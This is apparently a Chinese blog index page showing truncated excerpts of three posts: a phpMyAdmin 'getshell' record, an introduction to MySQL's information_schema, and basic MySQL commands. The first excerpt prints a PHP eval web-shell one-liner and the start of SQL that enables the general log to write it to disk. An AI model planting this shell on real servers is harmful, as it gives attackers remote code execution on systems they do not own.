phpmyadmin getshell 记录

2019年09月08日  No comment

    phpmyadmin getshellselect '<?php @eval($_POST[admin])?>'; show global variables like '%general%'; set global general_log = on; set global gen
阅读全文 »

MySQL的information_schema介绍

2019年06月09日  No comment

MySQL的information_schema介绍大家在安装或使用MYSQL时,会发现除了自己安装的数据库以外,还有一个 information_schema数据库。information_schema数据库是做什么用的呢,使用WordPress博客的朋友可能会想,是不是安装模板添加的数据库呀?看完本片文章后,你就会对information_schema数据库有所了解。information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据
阅读全文 »

MYSQL基本操作

2019年06月09日  No comment

用户管理:1.登陆        mysql //登录默认用户root 没密码        mysql -uroot -p1234                mysql -h host_name -u user_name –ppassword        mysql --user
阅读全文 »